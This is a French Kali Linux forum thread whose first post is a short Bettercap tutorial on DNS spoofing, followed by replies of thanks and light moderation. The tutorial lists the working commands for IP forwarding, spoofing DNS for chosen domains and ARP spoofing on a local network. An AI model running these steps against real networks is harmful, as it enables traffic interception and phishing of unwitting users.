Auteur Sujet: Petit tutoriel DNS Spoofing avec Bettercap  (Lu 555 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne investdatasystems

  • Membre Junior
  • *
  • Messages: 41
  • +7/-0
  • Mieux vaut faire croire qu'on ne sait rien !
    • Reuniware
Petit tutoriel DNS Spoofing avec Bettercap
« le: 26 novembre 2019 à 16:38:23 »
Salut tout le monde ! Alors une première pour moi ici, avec ce petit tutoriel sur l'utilisation de Bettercap pour le spoofing DNS sans utiliser l'outil arpspoof ni dns2proxy ni ettercap !

Le prérequis est d'avoir installé bettercap, mais les tutoriels pulullent sur le net sur ce point alors je vous laisse voir pour cette étape.

Alors il faut savoir qu'il y a 2 façons de spoofer les requêtes DNS sur bettercap.

Une première manière de faire est de répondre aux requêtes en les faisant pointer vers votre serveur web local.
Exemple : mondomaine1.com, mondomaine2.com et mondomaine2.com redirigeront vers votre machine Kali Linux 192.168.1.111 (exemple, mais c'est l'adresse de votre carte réseau que vous verrez par une commande ifconfig), cette machine répondant par une page web fournie par le serveur intégré à Bettercap, et fournissant les pages HTML d'un répertoire arbitrairement défini (par exemple à /var/www/html).

Une seconde manière de faire est d'utiliser un fichier de configuration qui associera une adresse IP à chaque nom de domaine des requêtes.
Exemple : mondomaine1.com sera dirigée vers l'adresse ip i1.i2.i3.i4, mondomaine2.com sera dirigée vers l'adresse ip i5.i6.i7.i8 etc...

Je vais expliquer dans ce tutoriel comment faire pour la première manière, dont l'objectif est d'avoir toutes les requêtes DNS pointant sur le serveur web sur votre machine Kali.

Dans un premier temps on active l'IP forwarding par :
echo 1 > /proc/sys/net/ipv4/ip_forward
Ensuite on vérifie que cette commande a produit l'effet escompté :
cat /proc/sys/net/ipv4/ip_forward
Puis on démarre bettercap :
sudo bettercap
On définit l'adresse du serveur web local sur lequel seront dirigées les requêtes DNS :
set http.server.path /var/www/html
On démarre le serveur web local intégré à bettercap :
http.server on
On active la prise en compte des requêtes DNS externes à notre machine :
set dns.spoof.all true
On définit les noms de domaine qui seront spoofés :
set dns.spoof.domains mondomaine1.com, mondomaine2.fr, mondomaine3.co.uk
On démarre le spoofing DNS et ARP :
dns.spoof on
arp.spoof on

Et voilà !

Dans un prochain tutoriel j'expliquerai l'utilisation d'un fichier de configuration (de mapping entre domaines et ip).

Have fun !

« Modifié: 26 novembre 2019 à 19:51:24 par investdatasystems »

Hors ligne Mikoto

  • Membre Junior
  • *
  • Messages: 37
  • +8/-0
Re : Petit tutoriel DNS Spoofing avec Bettercap
« Réponse #1 le: 26 novembre 2019 à 17:49:45 »
c'est intéressant dommage que tu explique pas ce qu'est le dns spoofing  :P

Hors ligne Snk

  • Modérateur
  • Membre Elite
  • *****
  • Messages: 1213
  • +87/-0
  • Multiboot Linux - Kali en Amateur - python(A)
Re : Petit tutoriel DNS Spoofing avec Bettercap
« Réponse #2 le: 26 novembre 2019 à 17:55:05 »
Sympa.  Merci à toi, d'avoir donné un peu de ton temps.  ;)
(C'est vrai qu' une petite définition aurait été un plus, pour ceux qui ne connaissent pas.)
« Modifié: 26 novembre 2019 à 17:57:31 par Snk »
On ne gagne pas sa Liberté , elle se prend, de force s'il le faut.
Membre du P.L.F, Bill Gate$ suck'$
A l'epoque c'était système D (comme démerdes-toi)
Anti GAFAM - Brûlons les tous!

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2172
  • +113/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Petit tutoriel DNS Spoofing avec Bettercap
« Réponse #3 le: 26 novembre 2019 à 18:11:14 »
Salut,

ça fais un tuto dns spoofing en plus :)

Merci :)
Mess  with the bests.
Die like the rest.

Hors ligne investdatasystems

  • Membre Junior
  • *
  • Messages: 41
  • +7/-0
  • Mieux vaut faire croire qu'on ne sait rien !
    • Reuniware
Re : Petit tutoriel DNS Spoofing avec Bettercap
« Réponse #4 le: 26 novembre 2019 à 19:46:39 »
De rien, c'est avec plaisir !!

Hors ligne investdatasystems

  • Membre Junior
  • *
  • Messages: 41
  • +7/-0
  • Mieux vaut faire croire qu'on ne sait rien !
    • Reuniware
Re : Re : Petit tutoriel DNS Spoofing avec Bettercap
« Réponse #5 le: 26 novembre 2019 à 19:48:52 »
c'est intéressant dommage que tu explique pas ce qu'est le dns spoofing  :P

Oui c'est vrai, dès que je trouve un peu de temps j'agrémenterai le tuto ! :)

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2172
  • +113/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Petit tutoriel DNS Spoofing avec Bettercap
« Réponse #6 le: 26 novembre 2019 à 19:50:48 »
Pense à éditer tes messages au lieu d'en poster plusieurs à la suite ;)
Mess  with the bests.
Die like the rest.

Hors ligne investdatasystems

  • Membre Junior
  • *
  • Messages: 41
  • +7/-0
  • Mieux vaut faire croire qu'on ne sait rien !
    • Reuniware
Re : Petit tutoriel DNS Spoofing avec Bettercap
« Réponse #7 le: 26 novembre 2019 à 19:51:54 »
Ok chief !

Hors ligne Koma

  • Membre sérieux
  • ***
  • Messages: 259
  • +22/-4
  • Don't panick, i'll be back.
Re : Petit tutoriel DNS Spoofing avec Bettercap
« Réponse #8 le: 26 novembre 2019 à 21:05:47 »
Cool ça merci ! N'hésite pas à passer dire bonjour dans la shoutbox ;)
But first : let me google that for you.

Copyright Réservé SNK inc. "C'est pas un McDrive ici !"
Copyright réservé ZeR0 TM "Ce n'est pas flunch ici"

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2172
  • +113/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Petit tutoriel DNS Spoofing avec Bettercap
« Réponse #9 le: 27 novembre 2019 à 09:04:56 »
Il passe déjà pour demander des trucs :P
Mess  with the bests.
Die like the rest.

Hors ligne investdatasystems

  • Membre Junior
  • *
  • Messages: 41
  • +7/-0
  • Mieux vaut faire croire qu'on ne sait rien !
    • Reuniware
Re : Petit tutoriel DNS Spoofing avec Bettercap
« Réponse #10 le: 27 novembre 2019 à 10:05:53 »
Merci Koma ! Et non ZeR0-@bSoLu, j'ai rien demandé moi !  ;D

Hors ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 2172
  • +113/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : Petit tutoriel DNS Spoofing avec Bettercap
« Réponse #11 le: 27 novembre 2019 à 10:29:08 »
Non jamais :P
Mess  with the bests.
Die like the rest.